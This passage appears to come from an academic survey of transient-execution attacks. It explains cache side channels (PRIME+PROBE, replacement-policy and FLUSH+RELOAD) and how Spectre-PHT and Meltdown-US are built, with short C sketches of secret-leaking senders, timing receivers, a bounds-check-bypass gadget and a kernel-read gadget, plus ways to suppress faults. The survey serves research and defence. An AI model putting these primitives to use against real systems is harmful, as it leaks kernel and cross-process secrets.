Exceptions correspond to errors that occur during instruction execution. They serve to inform the execution environment that an error occurred and it should be handled. The exception is handled when the instruction which created the exception is committed. Multiple components in the core can trigger exceptions, such as: the floating-point unit [10, 12, 64, 65, 126], the vector unit [10, 12, 65, 67, 126], the division unit [10, 65], the load-store unit [10, 12, 65, 126], and the instruction fetch unit [10, 12, 65, 126]. This subsection focuses on exceptions triggered by memory operations (load-store unit and instruction fetch unit) because of the core’s interactions that occur while handling virtual memory.
All speculation forms described in the previous sections have assumed that the addresses accessed are always mapped to the virtual memory of the process and the pages accessed have the correct set of permissions to perform the operation. On a system with virtual memory support, a memory operation, either an instruction fetch or data access, requires three verifications to be performed before committing, as in Listing 1: the core must verify if the page is mapped in the process’ memory, if the page is present in memory, and if its permissions allow such an operation.
Translating a virtual address to a physical address is a high-latency task. It requires a page table walk to obtain the physical address, setting the access bit and possibly the dirty bit of the page, and a check for the page’s permissions. Moreover, the latency is significantly higher if the page is not present in memory, which will require the operating system to fetch the page from disk to memory and resume execution of the process.
Cores assume that most memory accesses will access pages that are in memory, their translations are in the TLB, and the page has the correct set of permissions to allow the access. As such, there is a fast path to access the translation (TLB) and the permissions. To further exploit these fast paths, L1 caches can be virtually indexed and physically tagged [36, 166]. An example interaction would be checking the permissions and obtaining the translation in parallel [87]. As soon as the physical address is obtained but before the permission check completes, the memory access can be performed. The result of this memory access can be forwarded to other dependent instructions even if the permission check fails. This is possible because the result of the load will never be architecturally visible as a permission check fail will trigger an exception.
Listing 1. Pseudo-Code of a virtual memory access with a page-based virtual memory; access_type denotes if the memory operation is an instruction fetch, a load, or a store.
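The body of Listing 1 does not survive in this version of the text; the following is a hypothetical reconstruction of the three verifications described above. All helper names (pte_of, allowed, raise_exception, physical_access) and the PTE layout are assumptions made for illustration.

```c
#include <stdint.h>

/* Hypothetical reconstruction of Listing 1; names are illustrative. */
typedef enum { FETCH, LOAD, STORE } access_type_t;
typedef struct { int mapped, present, perms; uint32_t frame; } pte_t;
enum { PAGE_FAULT, PROTECTION_FAULT };

extern pte_t pte_of(uint32_t vaddr);            /* TLB hit or page table walk */
extern void raise_exception(int cause);
extern int allowed(int perms, access_type_t t); /* r/w/x and user/supervisor */
extern uint32_t physical_access(uint32_t paddr, access_type_t t);

uint32_t memory_access(uint32_t vaddr, access_type_t access_type) {
    pte_t pte = pte_of(vaddr);
    if (!pte.mapped)                      /* 1. page mapped in this process? */
        raise_exception(PAGE_FAULT);
    if (!pte.present)                     /* 2. page present in memory? the OS
                                             must fetch it from disk otherwise */
        raise_exception(PAGE_FAULT);
    if (!allowed(pte.perms, access_type)) /* 3. permissions allow the access? */
        raise_exception(PROTECTION_FAULT);
    return physical_access(pte.frame | (vaddr & 0xfffu), access_type);
}
```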

3.4 Side-Effects

From the micro-architectural point-of-view, speculation only operates in the domain of the hardware thread that performed the prediction. The commit stage gates the effects of speculation: if the prediction is correct, the effects are made visible; otherwise, they are not. However, even though within the architectural domain the effects of the speculation are squashed, some remnants of speculation can still be obtained from other parts of the micro-architecture. Therefore, there are instruction types which, besides the ISA-defined architectural behavior, also implicitly modify the micro-architectural state regardless of the outcome of the speculation. Table 1 shows which instruction types program which components.
Table 1. Components Programmed by Side-Effects of Each Instruction Type

Instruction Type | Affected Micro-Architectural Component
Control Instructions | PHT [81], BHR [15], BTB [81], RAS [83], Cache Hierarchy [42, 90], Coherence Network [3, 177], MSHRs [135, 161], TLBs [158, 168], Network-on-Chip (NoC) traffic [111], DRAM Buffers [116]
Memory Instructions | Memory Dependence Prediction Unit [54, 159], Cache Hierarchy [42, 90], Coherence Network [3, 177], MSHRs [135, 161], TLBs [158, 168], NoC traffic [111], DRAM Buffers [116]
Integer/Floating-Point/Vector Instructions | Functional Unit Occupation [18]
As the cache hierarchy is a transparent resource to the core, the effects of speculative memory and control instructions are not wiped on commit. The data a core uses always comes from the L1 cache. Therefore, the results of mispredictions change the global state of the cache hierarchy (allocate cache lines, evict cache lines, change the state of the replacement policy of a set, etc.): mispredicted branches and jumps (Section 3.1), mispredicted address dependencies (Section 3.2), and mispredicted exceptions (Section 3.3). All memory accesses and/or control instructions that stem from these mispredictions will also change the global state of the hierarchy [81, 87].
Similarly to the cache hierarchy, the coherence scheme is also transparent to the cores. Mispredictions cause coherence traffic to flow through the cache hierarchy [3, 69, 172, 178]. Although the traffic is created by speculative instructions, it still changes the state of the global cache coherence, e.g., a cache line in modified/exclusive state in one core is downgraded to shared state when another core executes a load to it through a misprediction.
Most modern cache hierarchies use the write-back write-allocate write policy [36, 39]. Any memory operation that misses on a cache, triggers a load of the cache line from a higher level memory to the cache that issued the miss. Therefore, MSHRs are allocated every time a memory access misses on a cache level. When a cache level runs out of MSHRs, memory accesses cannot be dispatched to the cache hierarchy. Thus, the usage of MSHRs may reveal the memory access pattern or the contents accessed by the core [135, 160].
The cache hierarchy captures all forms of mis-speculation since the core will issue prefetch requests for data, and for coherence permissions, on behalf of instructions that have not been committed yet [42]. A load prefetches a cache line with coherence read permissions prior to commit. A store prefetches a cache line with coherence write permissions prior to commit. This is a common technique in designs with OoO execution to overlap the latency of the memory access with other instructions. The core verifies the speculation of a load by checking for a cache line hit when committing it. For a store, the core checks for a cache line hit and whether the cache line has coherence write permissions. Besides the cache hierarchy, other components are also implicitly programmed, such as the DRAM buffers [116], execution ports [18], system interrupts [28], and micro-op caches [124].

4 Retrieving DATA from Speculation Side-Effects in the Cache Hierarchy

Every program leaves remnants of transient execution throughout the cache hierarchy. However, those remnants have little to no value if they cannot be identified and if the data used within the transient execution cannot be recovered. An attacker wants to recover the information resulting from a victim's transient execution, circumventing the process isolation provided by virtual memory. This section focuses on identifying instruction sequences that build communication channels in the cache hierarchy such that the attacker can recover this information. Note that the cache hierarchy is not the only component from which communication channels can be built. There has been research on building communication channels through DRAM buffers [116], contention in execution ports [18, 81], system interrupts [28], and micro-op caches [124]. However, this section focuses solely on the cache hierarchy because it is a common component of all modern micro-architectures, the channel is simple to deploy (it requires few memory accesses), and it can be local to the same physical core or remote across different physical cores.
To obtain data, a communication channel is built using one exploited component of the cache hierarchy. The communication channel has a receiver and a sender. In general, the communication channel is built using three steps: ① the receiver sets up the state, ② the sender may or may not modify the previous state, and ③ the receiver checks the state to infer if and what data was transmitted (Figure 7). The receiver, through program analysis, knows which addresses will be accessed by the sender. In order to check if those memory accesses have been performed, the receiver will set up a specific state in the cache hierarchy ①. If the sender accessed the expected addresses, the state set up by the receiver will change ②. The receiver can infer what data was transmitted from the modification of the previously set-up state ③. The modification of the state is identified by the high or low latency of certain memory accesses.
Fig. 7. Generic communication channel in the cache hierarchy.
Listing 2. Example of a sender. DATA is transmitted through the cache hierarchy. The size of uint8_t is 1 byte.
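The body of Listing 2 is likewise missing from this version; the sketch below is a plausible reconstruction consistent with the surrounding description (Section 4.1 refers to the load on line 3, marked in a comment). The declarations of A and DATA are assumptions.

```c
#include <stdint.h>

extern volatile uint8_t *A;        /* probe array known to the receiver */
extern uint8_t DATA[128];          /* the secret being transmitted */
static const int offset_bits = 6;  /* 64 B cache lines (Figure 8) */

void sender(void) {
    for (int i = 0; i < 128; i++) {
        /* "line 3": the secret byte selects which cache set is touched */
        uint8_t tmp = *(A + ((uint32_t)DATA[i] << offset_bits) * sizeof(uint8_t));
        (void)tmp;
    }
}
```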
Building communication channels in the cache hierarchy is an extensively researched topic [1, 20, 26, 45, 46, 55, 69, 107, 109, 119, 174, 179, 180]. Herein, three main categories are defined for building communication channels through the cache hierarchy: eviction-based, replacement-policy-based, and coherence-based. Each category denotes which feature of the cache hierarchical system is being exploited. Eviction-based channels exploit set sharing between an attacker and a victim. The attacker occupies every way in a set, forcing the victim to evict one of the attacker's addresses. Replacement-policy-based channels exploit the replacement policy state in a set. This is an optimization of the previous channel: by controlling which way is going to be evicted, the attacker avoids having to probe every way in the set. Coherence-based channels do not rely on set sharing; instead, they exploit the coherence state of memory shared between the victim and the attacker. There are other channels available in the cache hierarchy that do not fit into these categories [31, 111, 130].
Each of the next sections describes the basic methodology to deploy a type of communication channel. For the examples herein, both the receiver and the sender share a byte-addressable, 4-way set-associative 128 KiB cache with 64 B lines (the hash used for a 32-bit address and the cache parameters are in Figure 8). Example C code is presented for each type of receiver. The sender is common to all channel types, as presented in Listing 2: it transmits the 128 bytes stored in the DATA array by performing secret-dependent memory accesses through array A. Therefore, the secret-dependent memory accesses will program the cache hierarchy in a unique way. A receiver with knowledge of this is able to extract the contents of DATA.
Fig. 8. Hash for a 4-way 128 KiB set-associative cache with 64B lines and cache parameters.

4.1 Eviction-Based Channels

Eviction-based channels are constructed by a receiver fully occupying a cache set. The information is encoded when the victim evicts an attacker address from the cache set. On a sender access, one of the receiver’s cache lines will be evicted [55, 107, 109, 176]. The receiver probes each address of the set to find if any data was transmitted (PRIME+PROBE). The receiver can also exploit the inclusive policy in use in the hierarchy and force evictions of cache lines in lower-level caches from higher-level caches [34, 68, 90, 175, 176]. As stated before (Section 2.2), evicting a cache line from an inclusive cache will evict the same cache line, if it is present, from any lower-level cache. On the other hand, evicting a cache line from a non-inclusive non-exclusive or exclusive cache will not evict the same cache line from any lower-level cache.
The sender in Listing 2 exhibits the properties of an eviction-based transmission channel. Each byte of DATA forms a unique memory pointer into A. As a result, each access will occupy a different cache set, i.e., the data transmitted is encoded in the number of the occupied set in the cache. Consider the case where the first byte stored in DATA is 0xa. For i = 0, the pointer into A to be loaded in line 3 of the sender is constructed as \(\texttt {A} + (\texttt {DATA}[0] \lt \lt \texttt {offset_bits}) \times \texttt {sizeof(uint8_t)}\). The size of a uint8_t is 1 byte, offset_bits is 6 bits, and DATA[0] holds 0xa, thus the pointer is \(\texttt {A} + (\texttt {0xa} \lt \lt 6)\). From the hash function in Figure 8, observe that the contents of DATA are shifted into the index part of the hash, dictating which set of the cache will be occupied. A receiver can detect which sets A occupies by building an eviction set, i.e., finding a group of addresses which fully occupy the same set and, consequently, are the full list of eviction candidates.
Figure 9 shows an example of one eviction-based channel. The receiver fills a cache set with its addresses ①. The sender accesses the same set and is forced to evict one of the receiver addresses ②. The receiver will check if its addresses are still in cache. When loading each address, it will find that \(\text{A1}_R\) was evicted due to the high load latency ③. Listing 3 shows C code for the receiver to capture information transmitted by the sender using the described channel. The offset of buf needs to be carefully selected as the transmitted data will be encoded in the number of the occupied set. To create a set collision, j shifts 15 bits (index_bits + offset_bits) such that the set is the same but the tag is different. After filling the set, the receiver will check if data was transmitted by checking the timing of accessing the addresses that were used to fill the set. It is important to note that the attacker cannot control every memory access performed by the victim. There may be other memory accesses, either by the victim, the attacker, or any other process, that will evict data from the attacker’s eviction set. To avoid false positives, the attacker will have to execute Listing 3 multiple times such that the attacker’s analysis is statistically relevant [48].
Fig. 9. Eviction-Based: PRIME+PROBE. The examples show the steps taken by the receiver and sender on each phase: setup state, modify state, and check state. \(\text{A}_R\) denotes addresses belonging to the receiver, and \(\text{A}_S\) denote addresses belonging to the sender.
Listing 3. An example receiver for an eviction-based communication channel.
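The body of Listing 3 is not reproduced here; the following PRIME+PROBE receiver is a hedged sketch for the example cache of Figure 8. The __rdtscp-based timing helper and the cycle threshold are x86-specific assumptions, and in practice this loop must be repeated for statistical relevance, as noted above.

```c
#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>               /* __rdtscp: x86-specific assumption */

#define WAYS 4
#define STRIDE (1u << 15)            /* index_bits + offset_bits = 15:
                                        same set, different tag */
#define THRESHOLD 100                /* cycles; platform-dependent assumption */

static uint8_t buf[WAYS * STRIDE];   /* offset chosen so value v maps to set v */

static uint64_t timed_load(volatile uint8_t *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    return __rdtscp(&aux) - t0;
}

void receiver(void) {
    for (int v = 0; v < 256; v++) {  /* one cache set per possible byte value */
        /* prime: occupy all four ways of set v */
        for (int j = 0; j < WAYS; j++)
            (void)*(volatile uint8_t *)&buf[(v << 6) + j * STRIDE];
        /* ... the sender runs here ... */
        /* probe: a slow reload means the sender evicted us from set v */
        for (int j = 0; j < WAYS; j++)
            if (timed_load(&buf[(v << 6) + j * STRIDE]) > THRESHOLD)
                printf("candidate transmitted byte: 0x%x\n", v);
    }
}
```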

4.2 Replacement-Policy-Based Channels

Replacement-policy-based channels encode the information to be transmitted in the replacement policy state of a cache set, but are otherwise similar to eviction-based channels. The receiver will build an eviction set. By controlling all addresses, the receiver can access its addresses in a specific pattern so that the replacement policy will evict a specific address when the sender accesses the set. To check what data was transmitted by the sender, the receiver will force an eviction. If the expected line was evicted, then the sender did not transmit data. However, if some other line was evicted instead, then the sender did transmit data [20, 119, 174].
For this transmission channel, consider that the buffer A is shared between the sender and the receiver. This can occur when the attacker and the victim share the same dynamic library, e.g., libssl for a cryptographic operation. Figure 10 shows an example of a replacement-policy communication channel. The receiver accesses a cache set such that the replacement policy is programmed to select the address \(\text{A1}_{S + R}\) for eviction ①. The sender accesses the same address, changing the eviction candidate to \(\text{A3}_R\) ②. The receiver forces an eviction, expecting \(\text{A1}_{S + R}\) to be evicted; however, \(\text{A3}_R\) is evicted instead ③. The receiver can detect which address was evicted by re-accessing the addresses originally in the set, and thereby detect if the sender transmitted data. Listing 4 shows C code for the receiver to capture information transmitted by the sender using the described channel. Note that the receiver code is similar to the eviction-based channel with the added steps to program the replacement policy. Similarly, the attacker will have to execute this listing multiple times such that the results are statistically relevant.
Fig. 10.
Fig. 10. Replacement-Policy-Based. The examples show the steps taken by the receiver and sender on each phase: setup state, modify state, and check state. \(\text{A}_R\) denotes addresses belonging to the receiver, \(\text{A}_S\) denotes addresses belonging to the sender, and \(\text{A}_{S + R}\) denotes addresses that belong to both the sender and receiver.
Listing 4.
Listing 4. Example of a receiver in a replacement-policy-based communication channel.
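A minimal sketch of the added replacement-policy programming step, reusing the constants and timing idiom from the previous sketch, might look as follows. It assumes an LRU-like policy in which re-accessing a line promotes it; the concrete access pattern needed to program a real policy (e.g., tree-PLRU) is micro-architecture specific.

/* Replacement-policy receiver sketch, reusing WAYS, STRIDE, THRESHOLD,
 * and __rdtscp from the sketch above. buf[0] is the shared line that is
 * expected to be the eviction candidate; extra maps to the same set. */
static int probe_replacement(volatile uint8_t *buf, volatile uint8_t *extra)
{
    unsigned aux;

    /* Fill the set, then touch every line except the designated victim,
     * programming the policy to evict buf[0] next. */
    for (int w = 0; w < WAYS; w++)
        (void)buf[w * STRIDE];
    for (int w = 1; w < WAYS; w++)
        (void)buf[w * STRIDE];

    /* ... the sender may touch the shared line here, promoting it and
     * moving the eviction candidate to another line ... */

    /* Force one eviction, then time the designated victim: if it is
     * still cached (fast), the sender changed the policy state. */
    (void)extra[0];
    uint64_t t0 = __rdtscp(&aux);
    (void)buf[0];
    uint64_t t1 = __rdtscp(&aux);
    return (t1 - t0) < THRESHOLD; /* 1 = data transmitted */
}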

4.3 Coherence-Based Channels

Coherence-Based channels depend on modifications to the global coherence state. They are broken into two types, depending on the ability to use the flush instruction. The flush instruction allows a thread to remove its addresses from the cache hierarchy [10, 12, 65]. However, not all privilege levels have access to such an instruction. For example, x86-based systems allow userland processes to execute the instruction [10, 65] but ARM-based systems do not [12, 44]. This section focuses on communication channels built with flush instructions; however, coherence-based channels can also be built without a flush instruction [44, 130].
Flush-Based channels encode the transmitted information by placing a memory address in the cache hierarchy, and rely on the sender and receiver sharing some memory, e.g., the same dynamic library. One method to transmit data is for the receiver to flush the expected sender's transmission from the hierarchy and then re-access it at a later time (FLUSH+RELOAD) [179]. The second access will either be very fast, because the sender re-accessed the data and placed it in the cache hierarchy, or slow, if the data is still in external memory. The presence of the flushed address in the hierarchy indicates that data was transmitted, and the loaded address indicates what data was transmitted.
Another option for the receiver is to continuously flush the data from memory (FLUSH+FLUSH) [46]. Issuing a flush triggers invalidation requests in the coherence network. If there is at least one copy of the cache line in the hierarchy, all invalidation requests will have to complete before the flush instruction completes. Therefore, the second flush will be slow if the data is in the cache hierarchy, and fast if it is not.
Once again, consider that the buffer A is shared between the receiver and sender. Figure 11 shows an example of a FLUSH+RELOAD communication channel. The receiver flushes a shared address from the cache hierarchy ①. The sender then accesses the same address, placing it back in the hierarchy ②. The receiver loads the address: a fast access implies that the sender transmitted data, whereas a slow access implies that the sender did not transmit data ③. Listing 5 shows C code for the receiver to capture information transmitted by the sender using the described channel. Unlike the eviction-based channel, the receiver does not have to find address collisions for the same set or share a cache level with the sender. Furthermore, if it is known that the victim is the only other process sharing A with the attacker, then the attacker only has to execute Listing 5 once.
Fig. 11.
Fig. 11. Flush-Based: FLUSH+RELOAD. The examples show the steps taken by the receiver and sender on each phase: setup state, modify state, and check state. \(\text{A}_{S + R}\) denotes addresses that belong to the sender and receiver, and X is a do not care.
Listing 5.
Listing 5. Example of a receiver in a flush-based communication channel (FLUSH+RELOAD).
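A minimal FLUSH+RELOAD receiver sketch, in the spirit of Listing 5, is shown below for an x86 machine; the THRESHOLD constant is an assumption that must be calibrated for the target platform.

#include <stdint.h>
#include <x86intrin.h> /* _mm_clflush, _mm_mfence, __rdtscp; assumes x86 */

#define THRESHOLD 100 /* assumed hit/miss cycle threshold */

/* FLUSH+RELOAD receiver sketch: shared is a line mapped by both the
 * attacker and the victim, e.g., inside a shared library. */
static int flush_reload(volatile uint8_t *shared)
{
    unsigned aux;

    /* FLUSH: remove the shared line from the whole hierarchy. */
    _mm_clflush((const void *)shared);
    _mm_mfence();

    /* ... the sender runs here; accessing the line re-caches it ... */

    /* RELOAD: a fast access means the sender touched the line. */
    uint64_t t0 = __rdtscp(&aux);
    (void)*shared;
    uint64_t t1 = __rdtscp(&aux);
    return (t1 - t0) < THRESHOLD; /* 1 = data transmitted */
}

The FLUSH+FLUSH variant replaces the timed reload with a second, timed _mm_clflush, since flushing a cached line takes longer than flushing an absent one.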

5 Mounting Transient-Execution Attacks

Generally, Transient-Execution Attacks (TEAs) can be broken into three steps: (1) creating a transient window of operation, (2) accessing data transiently (Section 3), and (3) encoding the data in the micro-architectural state (Section 4). Herein, a transient window is defined as the time the commit stage is stalled waiting for an instruction to complete. The transient window is limited by the size of the ROB (larger than 200 operations in modern OoO architectures [36, 39]) and the latency of the instruction which is stalling the commit stage, e.g., an instruction waiting for memory, or the verification latency of the instruction which caused a mis-speculation. To create a transient window, the attacker stalls the commit stage using one of these mechanisms, e.g., a load that misses the cache hierarchy. In the second step, the goal is to use the time until the closure of the transient window to access the desired buffer or memory location. Then, in the third step, the data is transmitted from the transient domain into the micro-architectural state. The communication channel used can be any from Section 4, as long as the requirements for each communication channel are met (shared memory, invalidation-based cache coherence, inclusive caches, a flush instruction, the ability to execute the instruction transiently, etc.). This section provides a detailed description of how TEAs are constructed using the previously introduced concepts.
To describe these attacks, it is assumed that the attacker and the victim are two different processes or threads, running in the same system. They are both running on the same physical core either simultaneously, through Simultaneous Multi-Threading (SMT), or through time-sharing, with the OS/hypervisor switching the context between the victim and the attacker. Moreover, the attacker analyzes the program of the victim looking for the sender code from one of the communication channels previously described. The state-of-the-art defines two types of attacks depending on which micro-architectural state is being manipulated during the transient window [21, 23]: value prediction (Spectre-type) or exception handling (Meltdown-type). An attacker that deploys a Spectre-type attack trains a speculation mechanism such that, when the victim runs, part of its execution follows an illegal data-flow path until the misprediction is detected and rolled back. Hence, the victim uses the micro-architectural state as the attacker designed, accesses the requested data, and encodes the information in the micro-architectural state. An attacker that deploys a Meltdown-type attack triggers an exception in its own data-flow path, such that the instruction which triggered the exception is able to read data from micro-architectural buffers that should not be accessible, and the data is forwarded to other dependent instructions. The attacker itself, during the transient window, encodes the data into the micro-architectural state for later retrieval.

5.1 Original Spectre-PHT/-BTB and Meltdown-US Attacks

The original Spectre-Type [81] and Meltdown-Type [87] attacks were the first attacks which exploited the timing window of an unverified micro-architectural state to obtain data from a victim and transmit it to an attacker. They are referred to as Spectre-BTB, Spectre-PHT, and Meltdown-US [21].
The original Spectre-BTB/-PHT attacks have two key findings. First, the BTB/PHT is shared between all threads running on the same physical core. Therefore, an attacker with knowledge of the architecture of the BTB/PHT can train it. When the victim runs on the same core, it will mis-speculate on a jump, which will execute an incorrect sequence of instructions [81]. Second, the core's OoO backend will always execute instructions regardless of whether they were mispredicted [80, 81]. Listing 6 shows how array checks can be bypassed through misprediction using an attacker-controlled x. If x is larger than or equal to buf1_size, the buf1 and buf2 loads will not update the architectural state. However, a core that mis-speculates over the control instruction will place the loads in the core's L1 cache and the coherence state of the cache lines will change. Note that, even if the mis-speculation is detected while both loads are mid-flight, the cache lines will still be allocated because memory instructions that have been dispatched to the cache hierarchy cannot be canceled mid-flight [80]. A victim with this profile can be exploited to transmit the whole contents of its memory space through the cache hierarchy. In this example, data is transmitted using the address generated by buf2.
Consider an example where the victim is an OS kernel and the attacker is a userland process. The attacker has examined the kernel code and found a vulnerable system call that contains the code in Listing 6. In order to exploit the jump in the system call, the attacker will execute a jump of its own that uses the same target and prediction slot in the PHT as the exploitable jump in the system call. This is the same problem as the eviction set creation problem from the communication channel in Section 4. With this knowledge, the attacker will execute its jump multiple times, to program the PHT, such that the system call's jump performs the same prediction. Note that the jump executed by the attacker must have the opposite result of the victim's jump. In this instance, the attacker's jump will always be not-taken whereas the victim's jump, with an x greater than or equal to \(buf1\_size\), will always be mis-predicted as not-taken. After the attacker performs all of these steps, it cedes execution to the victim by calling the vulnerable system call. Figure 12 shows the micro-architectural events when Listing 6 is executed. For simplicity, in all future examples, the step of sending data through the communication channel is bundled as a single comm_channel instruction. Assume the load of buf1_size misses the cache hierarchy and, thus, opens a large speculative window in the micro-architecture ① (Figure 12(a)). The next instruction in the stream is a blt, for the if statement, which the fetch unit predicts to be a not-taken jump to the communication channel (② and ③ in Figure 12(a)). In this state, the commit stage is stalled because of the missing load (④ and ⑤ in Figure 12(b)). Therefore, the blt is not dispatched since it depends on the result of the load. However, the communication channel does not depend on this load and can execute. Thus, the communication channel is dispatched to the functional unit and updates the state of the data cache with the secret data (⑥ and ⑦ in Figure 12(b)).
Fig. 12.
Fig. 12. Spectre-PHT micro-architectural example using an OoO double-issue micro-architecture. D$ is the data cache and the X in it denotes a do not care. n is the number of bytes of the current instruction.
Listing 6.
Listing 6. Spectre-PHT bounds check bypass using an attacker-controlled x.
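The gadget can be sketched as follows, in the spirit of Listing 6. The multiplication by 512 is an assumed cache-line-sized stride that spreads each possible value of buf1[x] over a distinct cache line of buf2; buf1, buf2, and buf1_size belong to the victim and x is attacker-controlled.

#include <stdint.h>
#include <stddef.h>

extern uint8_t buf1[];   /* victim array; out-of-bounds reads reach secrets */
extern uint8_t buf2[];   /* probe array observable by the receiver */
extern size_t  buf1_size;

/* Victim gadget: on a trained predictor, the branch is speculatively
 * resolved as in-bounds even when x >= buf1_size, so both loads execute
 * transiently and leave buf1[x] encoded in which line of buf2 is cached. */
uint8_t victim(size_t x)
{
    if (x < buf1_size)
        return buf2[buf1[x] * 512]; /* 512-byte stride: one line per value */
    return 0;
}

To train the PHT, the attacker invokes the gadget repeatedly with in-bounds values of x before supplying the out-of-bounds value that points at the secret.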
Listing 7.
Listing 7. Meltdown-US using an attacker-controlled x.
The Meltdown-US attack showed that, during transient execution, memory accesses are still able to read the contents of a memory address even when the executing thread does not have the correct set of permissions, i.e., when the memory access triggers an exception [87]. This occurs in micro-architectures where the result of an instruction that triggered an exception can be forwarded to other dependent instructions without being zeroed (Intel, ARM, and IBM [80]). Similarly to Spectre-BTB/-PHT, if the memory operation is dispatched to the cache hierarchy prior to completing the verification, the cache line will be fetched into the L1 cache. The contents of the memory operation are then forwarded to other dependent instructions which can transmit data to a receiver (Listing 7). Note that Meltdown-US requires a valid physical address translation of the target address, i.e., the accessed address must be mapped in the attacker's virtual memory space.
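A sketch in the spirit of Listing 7 is shown below; as in the earlier example, the 512-byte stride is an assumption used to encode one byte per cache line of the probe array, and the exception must be suppressed or handled as discussed later in Section 5.2.

#include <stdint.h>

/* Meltdown-US gadget sketch: kernel_addr is a privileged address mapped
 * in the attacker's address space, and probe is an attacker-controlled
 * array used as the communication channel. */
void meltdown_gadget(volatile uint8_t *kernel_addr, volatile uint8_t *probe)
{
    uint8_t secret = *kernel_addr;   /* raises an exception at retirement... */
    (void)probe[secret * 512];       /* ...but transiently encodes secret first */
}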
Once again, consider that the victim is the kernel of an OS and the attacker is a userland process. Moreover, consider that the kernel is mapped into every userland process in order to speed up system calls. Through other means, the attacker has figured out a kernel address within its own memory map. Figure 13 shows a micro-architectural example of a Meltdown-US attack being performed by Listing 7. Assume a load misses the cache hierarchy ① (Figure 13(a)), which opens a large transient window, while a load to the kernel (lw kernel_addr) and the communication channel (comm_channel) wait to be issued. As a result, the commit stage stalls waiting for the load that missed the cache hierarchy ② (Figure 13(b)). Since the micro-architecture has a second issue port, the load to the kernel address is issued to the functional unit and it hits in the cache ③. While executing the load to the kernel address, an exception is triggered because the current process does not have the privilege to access that address ③. However, the exception is not raised immediately because the previous load missed the cache hierarchy, which caused a stall in the commit stage ④ (Figure 13(c)). Furthermore, the result of the load to the kernel address is forwarded to a dependent instruction, in this instance the communication channel ⑤. The final state of the data cache shows the kernel data encoded.
Fig. 13.
Fig. 13. Meltdown-US micro-architectural example using an OoO double-issue micro-architecture. D$ is the data cache and the X in it denotes a do not care.
TEAs require the attacker and the victim to share the same micro-architectural resources. However, there is an important difference between Spectre-BTB/-PHT and Meltdown-US. Spectre-BTB/-PHT need to program a specific state and then let the victim execute on the same physical core, i.e., the micro-architectural resources being shared are the branch prediction unit and the cache hierarchy. On the other hand, Meltdown-US is even more dangerous as it can be executed by an attacker that is not sharing the same physical core with the victim. In fact, the victim only needs to be loaded into memory [87], i.e., the victim and the attacker share the same memory map, translation entries, and cache hierarchy. The core will pull any data into the cache hierarchy, regardless of permissions, before the exception is triggered.

5.2 Advances in Spectre- and Meltdown-Type Attacks

Further research on how Spectre- and Meltdown-type attacks operate showed there are other components in the micro-architecture that can be exploited. Spectre attacks have gone on to exploit the RSB [83, 93, 170], the memory dependence prediction unit [80, 159], and the global PHT [15]. Meltdown attacks have expanded to exploit other micro-architectural buffers that forward data when an instruction triggers an exception. Recent attacks have shown that data can be forwarded from invalid MSHRs [98, 135, 160, 161], invalid load ports (load ports are pipeline registers that hold data between the L1 cache and the core) [135], invalid store buffer entries [22, 134], and addresses with the present bit set to 0 in the TLB entries [158, 168]. Table 2 shows a summary of the main TEAs published in the literature. The table classifies the attacks by type (Meltdown or Spectre), whether they can be executed from a remote core (Remote), which micro-architectural interaction is being exploited, and what method is used to deploy the attack. The names for each attack follow the nomenclature introduced by Canella et al. in [21]. Each name is defined by the construction <TYPE>-<EXPLOITED_COMPONENT>.
Table 2.
Name | Type | Remote | Micro-Architectural Interaction | Method
Spectre-PHT, Spectre-BTB (Original Spectre) [15, 81] | Spectre | N | BTB and PHT sharing | Train the victim's BTB/PHT in order to trick its instruction stream into executing an instruction sequence which reveals secure data.
Meltdown-US (Original Meltdown) [87] | Meltdown | Y | Forwards the result of an instruction which generated an exception to dependent instructions | Access a memory address for which the current thread does not have permissions. Even though the thread does not have permission, the data is still pulled into the cache hierarchy and forwarded to dependent instructions before triggering the exception.
Spectre-RSB [83, 93, 170] | Spectre | N | RSB sharing | Train the victim's RSB in order to trick its instruction stream into executing an instruction sequence which reveals secure data.
Spectre-STL [54] | Spectre | N | Memory dependence unit sharing | Train the memory dependence prediction unit to allow certain loads to execute before a store to the same address. The load will then forward its result to other dependent instructions. Useful if the targeted code is trying to zero secret data.
Meltdown-P (Foreshadow) [158, 168] | Meltdown | N | Pulls any data from the L1 cache; TLB sharing | Any valid address translation in the TLB, regardless of whether it throws an exception due to permissions or presence, can pull data from the L1 cache into dependent instructions. However, it does not allocate an MSHR on a miss, i.e., data cannot be fetched from higher cache levels.
Meltdown-MCA, Meltdown-GP (ZombieLoad [135], RIDL [160], CacheOut [161], Fallout [22]) | Meltdown | N | Reads data from invalid buffers | An exception is triggered when a virtual-to-physical translation fails due to the PTE not having the present bit set. Despite the exception, some micro-architectures try to speculate over the possible address translation using the LSBs of the virtual address (assuming 4KiB pages, the 12 LSBs). The load with the exception can pull data from MSHRs, the store buffer (committed stores), the store queue (uncommitted stores), and the load ports.
Load Value Injection [159] | Spectre/Meltdown | N | Memory dependence unit sharing | Train the victim's address disambiguation unit such that it loads a value from an attacker-chosen address under an exception.
Table 2. A Summary of TEAs Showing Which Type of Attack They Belong To, Which Micro-Architectural Interaction Is Being Used, Whether the Attack Can Be Executed from a Remote Core, and the Method Used to Exploit It
A difficulty in deploying TEAs is the size of the timing window in which to retrieve data and transmit it; both steps must complete for the attack to be successful. There are two limiting factors to the size of the transient window: the verification latency of the misprediction, and the number of instructions that can be executed prior to the conclusion of the verification [163]. In commodity micro-architectures, the highest-latency path is a memory access to an address that is not cached and whose virtual address translation is not in the TLB. This scenario has such a high latency that the attacker is only limited by the size of the ROB, assuming no other memory access is in the same circumstances.
The same idea can be applied to Meltdown: the instruction which triggers an exception can be placed behind another long-latency instruction. A difficulty specific to Meltdown is how to handle exceptions so that the attacker can continue executing (triggering an exception results in process termination). A possible solution is to spawn a child process which will run the Meltdown exploit. The child process terminates when the instruction which triggered the exception is committed, and the parent process can then read the micro-architectural state left by the child. This solution has the shortcoming of performing context switches between the parent and the child, where a context switch may destroy the micro-architectural state left by the child. A better solution is to handle the SEGFAULT directly [87]. In this case, there is no context switching between two processes; however, the OS still has to be called to defer the handling of the exception to the attacker's signal handler. An even better solution, if available, is to use transactional memory [65]. Within a transactional block, any instruction which triggers an exception will cause the architectural effects of the entire block to not take place, the exception is not delivered to the OS, and normal execution of the program resumes [65, 87, 142]. The OS is not involved, thus the micro-architectural state remains the same [158]. If transactional memory is not available in the platform, the attacker can use Spectre on top of Meltdown: the instruction which will cause the exception is hidden behind an always-mispredicted instruction. In this instance, there is no exception to suppress but the micro-architectural effects are the same [158]. 